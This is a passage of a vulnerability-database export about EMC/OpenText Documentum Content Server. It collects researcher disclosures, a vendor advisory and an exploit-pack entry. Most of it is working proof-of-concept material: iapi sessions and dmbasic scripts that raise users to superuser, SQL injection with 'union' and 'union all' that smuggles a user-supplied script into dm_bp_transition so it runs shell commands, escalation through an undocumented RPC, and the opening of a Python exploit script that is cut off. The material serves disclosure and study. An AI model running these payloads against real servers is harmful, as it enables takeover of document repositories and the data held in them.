Server, which allows users with sysadmin privileges to elevate their privileges to superuser (see CVE-2011-4144). On April 2014 I discovered another set of vulnerabilities related to CVE-2011-4144 (see attached VRF#HUDHKNW4.txt). On September 2014 vendor announced a fix (see CVE-2014-4622) for the first only vulnerability from VRF#HUDHKNW4.txt (check row 5 in CERT's spreadsheet for VU#315340 (http://www.kb.cert.org/vuls/id/315340)). Yesterday vendor announced a new fix (see CVE-2015-4531) related to VRF#HUDHKNW4.txt. Besides the fact that CVE-2015-4531 has a completely wrong description, CVE-2015-4531 does not introduce any security fixes. I believe that there are about a dozen of options to elevate privileges from sysadmin to superuser, but I'm going to describe the most obvious one.\r\n\r\n1. If attacker is able to create (or modify) docbase method (object with dm_method type) he is able to elevate his privileges through executing this method, example:\r\n\r\ncat > test.ebs\r\nConst CONNECTION_ERROR As Integer = 33\r\n\r\nSub rmain(d As String, u As String, g As String)\r\n s$ = dmAPIGet("connect," & d & "," & u & ",")\r\n\r\n If s = "" Then\r\n dmExit(CONNECTION_ERROR)\r\n End If\r\n\r\n q$ = "update dm_user objects" & _\r\n " set user_privileges=16" & _\r\n " where user_name='" & g & "'"\r\n\r\n s=dmAPIExec("execquery," & s & ",T," & q)\r\n\r\nEnd Sub\r\n\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f92d\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> set,c,l,run_as_server\r\nSET> T\r\n...\r\nOK\r\nAPI> set,c,l,use_method_content\r\nSET> T\r\n...\r\nOK\r\nAPI> set,c,l,method_type\r\nSET> dmbasic\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\nAPI> retrieve,c,dm_user where user_name='test'\r\n...\r\n11024be980000e8a\r\nAPI> get,c,l,user_privileges\r\n...\r\n0\r\nAPI> apply,c,,DO_METHOD,METHOD,S,test,\r\n ARGUMENTS,S,'repo dmadmin test'\r\n...\r\nq0\r\nAPI> retrieve,c,dm_user where user_name='test'\r\n...\r\n11024be980000e8a\r\nAPI> get,c,l,user_privileges\r\n...\r\n16\r\n\r\n2. for the reason mentioned above regular users are unable to create or modify docbase methods:\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f954\r\nAPI> save,c,l\r\n...\r\n[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: "The current user (test)\r\n needs to have superuser or sysadmin privilege to save or destroy dm_method object."\r\n\r\n3. But sysadmins were able to create docbase methods. Now if sysadmin tries to create docbase method it gets following error:\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f968\r\nAPI> set,c,l,object_name\r\nSET> test1\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\n[DM_SYSOBJECT_E_LINK_PERMIT2]error: "Linking or unlinking to the folder\r\n '/System/Methods' failed on sysobject '10024be98001f968'.\r\n WRITE permit is required on the folder, when using folder security."\r\n\r\n4. So, it is obvious that remediation provided by vendor relies on ACL restrictions for /System/Methods folder, the problem is vendor does not take into account that Content Server has a set of groups which allow to bypass ACL restrictions and are still manageable by sysadmin users, example:\r\n\r\nAPI> ?,c,alter group dm_escalated_write add testadmin\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f969\r\nAPI> set,c,l,object_name\r\nSET> test1\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\n\r\n\r\n\r\n__\r\nRegards,\r\nAndrey B. Panfilov\r\n", "cvss3": {}, "published": "2015-08-24T00:00:00", "type": "securityvulns", "title": "sysadmin privilege in EMC Documentum Content Server", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2015-4531", "CVE-2011-4144", "CVE-2014-4622"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:DOC:32406", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32406", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:01", "description": "\r\nProduct: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nFor detailed description see http://seclists.org/bugtraq/2015/Jul/51\r\n\r\nNew behavior introduced in CVE-2015-4532:\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\n repo repo dmadmin "" 0000000000000000 0000000000000000\r\n 0000000000000000 "0801fd08805c9dfe,'' union select r_object_id\r\n from dm_sysobject where r_object_id=''0801fd08805c9dfe"\r\n 0000000000000000 0000000000000000 0000000000000000 ""\r\n 0 0 T F T T dmadmin 0000000000000000'\r\n\r\n[DM_METHOD_E_METHOD_ARGS_INVALID]error:\r\n "The arguments being passed to the method 'dm_bp_transition' are invalid:\r\n arguments contain sql keywords which are not allowed."\r\n\r\n\r\nNew attack vector (note ALL keyword):\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\n repo repo dmadmin "" 0000000000000000 0000000000000000\r\n 0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id\r\n from dm_sysobject where r_object_id=''0801fd08805c9dfe"\r\n 0000000000000000 0000000000000000 0000000000000000 ""\r\n 0 0 T F T T dmadmin 0000000000000000'\r\n\r\n__\r\nRegards,\r\nAndrey B. Panfilov\r\n", "cvss3": {}, "published": "2015-08-24T00:00:00", "type": "securityvulns", "title": "EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2015-4532"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:DOC:32405", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32405", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:01", "description": "\r\nProduct: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nFor detailed description see attached VRF#HUFG9EBA.txt and VRF#HX5OLZ0F.txt, for vendor announcement see CVE-2015-4532 in http://seclists.org/bugtraq/2015/Aug/86. The problem is PoC code provided in VRF#HUFG9EBA.txt and VRF#HX5OLZ0F.txt misses two obvious points:\r\n\r\n1. Content Server supports about 400 undocumented RPC commands, but PoC code covers only 33 of them, for example, all versions of EMC Documentum Content Server support SAVE_CONT_ATTRS_V6 RPC command, this RPC command has the same behaviour as SAVE_CONT_ATTRS from VRF#HUFG9EBA.txt and hence it is vulnerable:\r\n\r\nAPI> retrieve,c,dm_user where user_name=USER\r\n...\r\n11024be980000900\r\nAPI> get,c,l,user_privileges\r\n...\r\n0\r\nAPI> get,c,l,i_vstamp\r\n...\r\n1\r\nAPI> apply,c,11024be980000900,SAVE_CONT_ATTRS_V6,\r\n OBJECT_TYPE,S,dm_user,IS_NEW_OBJECT,B,F,\r\n i_vstamp,I,1,user_privileges,I,16\r\n...\r\nq0\r\nAPI> ?,c,q0\r\nRESULT\r\n------------\r\n 1\r\nAPI> revert,c,l,\r\n...\r\nOK\r\nAPI> get,c,l,user_privileges\r\n...\r\n16\r\n\r\n\r\n2. Creating malicious user with superuser privileges or malicious docbase method is not the only option to escalate privileges, demonstration:\r\n\r\n-- \r\n-- acquiring r_object_id for brand new\r\n-- dm_registered object\r\n-- \r\nAPI> apply,c,,NEXT_ID_LIST,TAG,I,25,HOW_MANY,I,1\r\n...\r\nq0\r\nAPI> ?,c,q0\r\nnext_id\r\n----------------\r\n19024be98001fd0b\r\n(1 row affected)\r\n\r\n-- \r\n-- Creating brand new dm_registered object\r\n-- \r\nAPI> apply,c,19024be98001fd0b,SysObjSave,\r\n OBJECT_TYPE,S,dm_registered,\r\n IS_NEW_OBJECT,B,T,\r\n i_vstamp,I,0,\r\n table_name,S,dm_user_s,\r\n table_owner,S,repo,\r\n owner_name,S,repo,\r\n world_permit,I,7,\r\n object_name,S,dm_user_s,\r\n owner_table_permit,I,15,\r\n group_table_permit,I,15,\r\n world_table_permit,I,15,\r\n r_object_type,S,dm_registered\r\n...\r\nq0\r\nAPI> ?,c,q0\r\nresult\r\n------------\r\n 1\r\n(1 row affected)\r\n\r\n-- \r\n-- Now attacker is able to modify database tables\r\n-- \r\nAPI> ?,c,select count(*) from dm_dbo.dm_user_s\r\ncount(*)\r\n----------------------\r\n 7930\r\n(1 row affected)\r\n\r\nAPI> ?,c,update dm_dbo.dm_user_s set user_privileges=16\r\n where user_name=USER\r\nrows_updated\r\n------------\r\n 1\r\n(1 row affected)\r\n\r\nAPI> ?,c,select user_privileges from dm_dbo.dm_user_s\r\n where user_name=USER\r\nuser_privileges\r\n---------------\r\n 16\r\n(1 row affected)\r\n\r\n\r\n__\r\nRegards,\r\nAndrey B. Panfilov\r\n", "cvss3": {}, "published": "2015-08-24T00:00:00", "type": "securityvulns", "title": "Privilege escalation through RPC commands in EMC Documentum Content Server (incomplete fix in CVE-2015-4532)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2015-4532"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:DOC:32402", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32402", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:53:24", "description": "Code injection, privilege escalation.", "cvss3": {}, "published": "2015-09-14T00:00:00", "type": "securityvulns", "title": "EMC Documentum multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-4637", "CVE-2015-4535", "CVE-2014-2512", "CVE-2014-2514", "CVE-2014-2507", "CVE-2015-0517", "CVE-2014-2511", "CVE-2015-4533", "CVE-2015-4531", "CVE-2014-2510", "CVE-2014-4618", "CVE-2014-4626", "CVE-2014-2506", "CVE-2014-2520", "CVE-2015-4537", "CVE-2015-4534", "CVE-2014-2521", "CVE-2015-0548", "CVE-2015-4530", "CVE-2014-4638", "CVE-2015-4536", "CVE-2014-2518", "CVE-2015-4528", "CVE-2014-4629", "CVE-2015-0550", "CVE-2015-0547", "CVE-2014-2513", "CVE-2014-2508", "CVE-2014-4639", "CVE-2014-2515", "CVE-2014-2503", "CVE-2015-4532", "CVE-2015-4529", "CVE-2015-4544", "CVE-2015-4524", "CVE-2015-0549", "CVE-2015-0518", "CVE-2014-4635", "CVE-2015-0551", "CVE-2014-4636"], "modified": "2015-09-14T00:00:00", "id": "SECURITYVULNS:VULN:13831", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13831", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n\r\n\r\nESA-2014-091.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2014-091: EMC Documentum Content Server Multiple Privilege Escalation Vulnerabilities \r\n\r\nEMC Identifier: ESA-2014-091\r\n\r\nCVE Identifier: CVE-2014-4621, CVE-2014-4622\r\n\r\nSeverity Rating: CVSS v2 Base Score: See below for individual scores for each CVE\r\n\r\nAffected products: \r\n\r\n\u2022\tAll EMC Documentum Content Server versions of 7.1\r\n\u2022\tAll EMC Documentum Content Server versions of 7.0\r\n\u2022\tAll EMC Documentum Content Server versions of 6.7 SP2\r\n\u2022\tAll EMC Documentum Content Server versions prior to 6.7 SP2\r\n\r\nSummary: \r\n\r\nEMC Documentum Content Server contains fixes for multiple privilege escalation vulnerabilities that can be potentially leveraged by a malicious attacker to compromise the affected system.\r\n\r\nDetails: \r\n\r\nEMC Documentum Content Server may be susceptible to the following privilege escalation vulnerabilities: \r\n\u2022\tCVE-2014-4621:\r\nNon-privileged Content Server users are allowed to create system objects with super-user privileges due to improper authorization checks being performed on subtypes of protected Documentum system types. This could be potentially exploited by a malicious attacker to gain unauthorized access to data or to perform unauthorized actions on Content Server.\r\nCVSS v2 Base Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)\r\n\r\n\u2022\tCVE-2014-4622:\r\nContent Server users with sysadmin privileges may potentially escalate their privileges to become a super-user due to improper authorization checks being performed on subgroups that exists within the dm_superusers group and other privileged groups. This could be potentially exploited by a malicious attacker to gain unauthorized access to data or to perform unauthorized actions on Content Server.\r\nCVSS v2 Base Score: 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C)\r\n\r\nResolution: \r\n\r\nThe following versions contain the security fixes to address these vulnerabilities: \r\n\u2022\tEMC Documentum Content Server version 7.1 P08 and later\r\n\u2022\tEMC Documentum Content Server version 7.0 P15: Hotfix is available for Windows & Linux. For Solaris and AIX contact EMC Support.\r\n\u2022\tEMC Documentum Content Server version 6.7 SP2 P17 and later\r\n\r\nEMC strongly recommends all customers to upgrade to one of the above versions at the earliest opportunity.\r\n\r\nLink to remedies:\r\n\r\nRegistered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server\r\n\r\nContact EMC Support to obtain hotfix for 7.0 P15 Windows & Linux \r\n\r\n\r\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.\r\n\r\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.\r\n\r\nEMC Product Security Response Center\r\nsecurity_alert@emc.com\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlQXOb4ACgkQtjd2rKp+ALxGuwCfdFo23yn+/7W/QIYljZf1/E9O\r\nKPYAnRC4UuwJWernPdAvIcjzWrvhG3ly\r\n=Z24R\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-09-21T00:00:00", "type": "securityvulns", "title": "ESA-2014-091: EMC Documentum Content Server Multiple Privilege Escalation Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-4621", "CVE-2014-4622"], "modified": "2014-09-21T00:00:00", "id": "SECURITYVULNS:DOC:31099", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31099", "sourceData": "", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution", "cvss3": {}, "published": "2017-04-25T00:00:00", "type": "exploitpack", "title": "OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4533", "CVE-2017-7221", "CVE-2014-2513"], "modified": "2017-04-25T00:00:00", "id": "EXPLOITPACK:4023A919E9FB0AB63EBFE6682BDBFA0D", "href": "", "sourceData": "'''\nCVE Identifier: CVE-2017-7221\nVendor: OpenText\nAffected products: OpenText Documentum Content Server (all versions)\nResearcher: Andrey B. Panfilov\nSeverity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\nFix: not available\nPoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44\n\nDescription: \n\nall versions of Documentum Content Server contain dm_bp_transition docbase \nmethod (\"stored procedure\u201d) which is written on basic, implementation of this docbase \nmethods does not properly validate user input which allows attacker to execute arbitrary \ncode with superuser privileges.\n\nRelated code snippet is:\n\n==========================================8<========================================\n\n'Evaluate the user-defined entry criteria\nIf (result = True And run_entry = \"T\") Then\nIf (debug = True) Then\nPrintToLog sess, \"Run user defined entry criteria.\"\nEnd If\n'\n' researcher comment:\n' userEntryID parameter is controlled by attacker\n'\nresult = RunProcedure(userEntryID, 1, sess, sysID,_\nuser_name, targetState)\nEnd If\n\n...\n\n'\n' researcher comment:\n' procID parameter is controlled by attacker\n'\n\nFunction RunProcedure(procID As String, procNo As Integer,_\nsessID As String, objID As String, userName As String,_\ntargetState As String) As Boolean\n\n...\n\nStartIt:\nIf (procID <> \"0000000000000000\") Then\nresult = CheckStatus(\"\", 1, \"loading procedure \" & procID, True, errorMsg)\n'\n' researcher comment:\n' here basic interpreter loads content of user-provided script\n' from underlying repostiory using following technique:\n' \n' checking that it is dealing with dm_procedure object\n' (check was introduced in CVE-2014-2513):\n' id,c,dm_procedure where r_object_id='procID'\n' \n' getting content of basic script\n' fetch,c,procID\n' getpath,c,l\n'\n\nresult = external(procID)\nIf (result = True) Then\nIf (procNo = 1) Then\n' --- Running user-defined entry criteria ---\nresult = CheckStatus(\"\", 1, \"Running EntryCriteria\", True, errorMsg)\nOn Error Goto NoFunction\n'\n' researcher comment\n' here dmbasic interpreter executes user defined function\n'\nresult = EntryCriteria(sessID, objID, userName,_\ntargetState, errorStack)\nIf (result = False) Then\nerrorStack = \"[ErrorCode] 1500 [ServerError] \" + _\nerrorStack\nEnd If\n\n==========================================>8========================================\n\nSo, attacker is able to create it\u2019s own basic procedure in repository and pass it\u2019s identifier\nas argument for dm_bp_transition procedure:\n\n\n==========================================8<========================================\n$ cat /tmp/test\ncat: /tmp/test: No such file or directory\n$ cat > test.ebs\nPublic Function EntryCriteria(ByVal SessionId As String,_\nByVal ObjectId As String,_\nByVal UserName As String,_\nByVal TargetState As String,_\nByRef ErrorString As String) As Boolean\nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\")\nEntryCriteria=True\nEnd Function\n$ iapi\nPlease enter a docbase name (docubase): repo\nPlease enter a user (dmadmin): unprivileged_user\nPlease enter password for unprivileged_user:\n\n\nEMC Documentum iapi - Interactive API interface\n(c) Copyright EMC Corp., 1992 - 2011\nAll rights reserved.\nClient Library Release 6.7.1000.0027\n\n\nConnecting to Server using docbase repo\n[DM_SESSION_I_SESSION_START]info: \"Session 0101d920800b1a37\nstarted for user unprivileged_user.\"\n\n\nConnected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle\nSession id is s0\nAPI> create,c,dm_procedure\n...\n0801d920804e5416\nAPI> set,c,l,object_name\nSET> test\n...\nOK\nAPI> setfile,c,l,test.ebs,crtext\n...\nOK\nAPI> save,c,l\n...\nOK\nAPI> ?,c,execute do_method with method='dm_bp_transition',\narguments='repo repo dmadmin \"\" 0000000000000000 0000000000000000\n0000000000000000 0801d920804e5416 0000000000000000 0000000000000000\n0000000000000000 \"\" 0 0 T F T T dmadmin 0000000000000000'\n(1 row affected)\n\nAPI> Bye\n$ cat /tmp/test\ndm_bp_transition_has_vulnerability\n\n==========================================>8========================================\n\n\nVendor was been notified about this vulnerability on November 2013 using customer \nsupport channel, after a while vendor started claiming that this vulnerability \nwas remediated, though no CVE was announced. Moreover, the fix was contested\nand CERT/CC started tracking this vulnerability, the PoC provided\nto CERT/CC was:\n\n==========================================8<========================================\nVendor have decided that the root cause of problem is users are able to\ncreate dm_procedure objects, and now in Documentum Content Server\nv6.7SP1P26 we have following behavior:\n\n[DM_SESSION_I_SESSION_START]info: \"Session 0101d920800f0174 started for\nuser unprivileged_user.\"\n\n\nConnected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle\nSession id is s0\nAPI> create,c,dm_procedure\n...\n0801d920805929d0\nAPI> set,c,l,object_name\nSET> test\n...\nOK\nAPI> setfile,c,l,test.ebs,crtext\n...\nOK\nAPI> save,c,l\n...\n[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: \"The current user\n(unprivileged_user) needs to have superuser or sysadmin privilege.\"\n\nBUT:\n\nAPI> create,c,dm_document\n...\n0901d920805929dd\nAPI> set,c,l,object_name\nSET> test\n...\nOK\nAPI> setfile,c,l,test.ebs,crtext\n...\nOK\nAPI> save,c,l\n...\nOK\n\nAPI> ?,c,execute do_method with\nmethod='dm_bp_transition',arguments='repo repo dmadmin \"\"\n0000000000000000 0000000000000000 0000000000000000 0901d920805929dd\n0000000000000000 0000000000000000 0000000000000000 \"\" 0 0 T F T T\ndmadmin 0000000000000000'\n(1 row affected)\n\n....\n\nAPI> Bye\n~]$ cat /tmp/test\ndm_bp_transition_has_vulnerability\n~]$\n\n==========================================>8========================================\n\nOn July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated.\n\nOn November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor \nconstantly fails to provide status of reported vulnerabilities) by providing another proof of concept, \ndescription provided to CERT/CC was:\n\n==========================================8<========================================\nI have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following\nerror:\n\n[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected\nerror: [DM_API_W_NO_MATCH]warning: \"There was no match in the\ndocbase for the qualification: dm_procedure where r_object_id =\n'0801fd08805c9dfe'\"\n\nSuch behaviour means that EMC tried to remediate a security issue by\n\"checking\" object type of supplied object:\n\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\nSession id is s0\nAPI> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'\n...\n[DM_API_W_NO_MATCH]warning: \"There was no match in the docbase for the\nqualification: dm_procedure where r_object_id = '0801fd08805c9dfe'\"\n\nAPI> Bye\n\nbin]$ strings dmbasic| grep dm_procedure\nid,%s,dm_procedure where object_name = '%s' and folder('%s')\nid,%s,dm_procedure where r_object_id = '%s'\n# old version of dmbasic binary\nbin]$ strings dmbasic| grep dm_procedure\nbin]$\n\nSo, the fix was implemented in dmbasic binary, the problem is neither 6.7\nSP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch\nthat was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the\nissue is still reproducible because introduced check could be bypassed\nusing SQL injection:\n\n~]$ cat test.ebs\nPublic Function EntryCriteria(ByVal SessionId As String,_\nByVal ObjectId As String,_\nByVal UserName As String,_\nByVal TargetState As String,_\nByRef ErrorString As String) As Boolean\nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\")\nEntryCriteria=True\nEnd Function\n~]$ cat /tmp/test\ncat: /tmp/test: No such file or directory\n\n~]$ iapi\nPlease enter a docbase name (docubase): repo\nPlease enter a user (dmadmin): test01\nPlease enter password for test01:\n\n\nEMC Documentum iapi - Interactive API interface\n(c) Copyright EMC Corp., 1992 - 2011\nAll rights reserved.\nClient Library Release 6.7.2190.0142\n\n\nConnecting to Server using docbase repo\n[DM_SESSION_I_SESSION_START]info: \"Session 0101fd088014000c started for\nuser test01.\"\n\n\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\nSession id is s0\nAPI> create,c,dm_sysobject\n...\n0801fd08805c9dfe\nAPI> set,c,l,object_name\nSET> test\n...\nOK\nAPI> setfile,c,l,test.ebs,crtext\n...\nOK\nAPI> save,c,l\n...\nOK\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\n0000000000000000 0000000000000000 0000000000000000 \"\"\n0 0 T F T T dmadmin 0000000000000000'\n\n...\n\n(1 row affected)\n\nAPI> Bye\n~]$ cat /tmp/test\ndm_bp_transition_has_vulnerability\n~]$\n\nHere \"union ...\" allows to bypass check based on \"id\" call:\n\nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle\nSession id is s0\nAPI> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union\nselect r_object_id from dm_sysobject where\nr_object_id='0801fd08805c9dfe'\n...\n0801fd08805c9dfe\nAPI> apply,c,,GET_LAST_SQL\n...\nq0\nAPI> next,c,q0\n...\nOK\nAPI> get,c,q0,result\n...\n\nselect all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where\n((dm_procedure.r_object_id='0801fd08805c9dfe,')) and\n(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)\nunion select all dm_sysobject.r_object_id from dm_sysobject_sp\ndm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))\nand (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)\n\nAPI> close,c,q0\n...\nOK\n\nComma is required to bypass error in fetch call:\nAPI> fetch,c,0801fd08805c9dfe' union select r_object_id from\ndm_sysobject where r_object_id='0801fd08805c9dfe\n...\n[DM_API_E_BADID]error: \"Bad ID given: 0801fd08805c9dfe' union\nselect r_object_id from dm_sysobject where r_object_id=\n'0801fd08805c9dfe\"\n\n\nAPI> fetch,c,0801fd08805c9dfe,' union select r_object_id from\ndm_sysobject where r_object_id='0801fd08805c9dfe\n...\nOK\n==========================================>8========================================\n\nOn August 2015 vendor had undertaken another attempt to remediate this vulnerability\ncheck ESA-2015-131/CVE-2015-4533 for details.\n\nOn August 2015 the fix was contested, check http://seclists.org/bugtraq/2015/Aug/110\nfor detailed description - I just demonstrated another attack vector - using \nUNION ALL keyword instead of UNION:\n\n=================================8<================================\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\n0000000000000000 0000000000000000 0000000000000000 \"\"\n0 0 T F T T dmadmin 0000000000000000'\n\n[DM_METHOD_E_METHOD_ARGS_INVALID]error:\n\"The arguments being passed to the method 'dm_bp_transition' are\ninvalid:\narguments contain sql keywords which are not allowed.\"\n\n\nNew attack vector (note ALL keyword):\n\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\nrepo repo dmadmin \"\" 0000000000000000 0000000000000000\n0000000000000000 \"0801fd08805c9dfe,'' union all select r_object_id\nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\"\n0000000000000000 0000000000000000 0000000000000000 \"\"\n0 0 T F T T dmadmin 0000000000000000'\n\n=================================>8================================\n\n\nRecently I have noticed that latest versions of Documentum Content\nServer are not affected by the PoC provided above, however all versions\nof Documentum Content Server are still vulnerable because vendor incorrectly\nimplemented input validation: they convert arguments to lower/upper-case, \nreplace line feed, carriage return and tab characters by a space, \nremove double spaces, after that they check where resulting string contains \nspecial keywords ('union ' and 'union all') or not - it is possible \nto use other whitespace characters like backspace, which is demonstrated\nin the PoC. \n\n\n__\n\nRegards,\nAndrey B. Panfilov\n\n\n\nCVE-2017-7221.py\n'''\n\n#!/usr/bin/env python\n\nimport socket\nimport sys\nfrom os.path import basename\n\nfrom dctmpy.docbaseclient import DocbaseClient\nfrom dctmpy.obj.typedobject import TypedObject\n\nCIPHERS = \"ALL:aNULL:!eNULL\"\n\n\ndef usage():\n print \"usage:\\n\\t%s host port user password\" % basename(sys.argv[0])\n\n\ndef main():\n if len(sys.argv) != 5:\n usage()\n exit(1)\n\n (session, docbase) = create_session(*sys.argv[1:5])\n\n if is_super_user(session):\n print \"Current user is a superuser, nothing to do\"\n exit(1)\n\n install_owner = session.serverconfig['r_install_owner']\n document_id = session.next_id(0x08)\n content_id = session.next_id(0x06)\n\n store = session.get_by_qualification(\"dm_store\")\n format = session.get_by_qualification(\"dm_format where name='crtext'\")\n handle = session.make_pusher(store['r_object_id'])\n if handle < 1:\n print \"Unable to create pusher\"\n exit(1)\n\n data = \"Public Function EntryCriteria(ByVal SessionId As String,_\" \\\n \"\\nByVal ObjectId As String,_\" \\\n \"\\nByVal UserName As String,_\" \\\n \"\\nByVal TargetState As String,_\" \\\n \"\\nByRef ErrorString As String) As Boolean\" \\\n \"\\nDim QueryID As String\" \\\n \"\\nDim Query As String\" 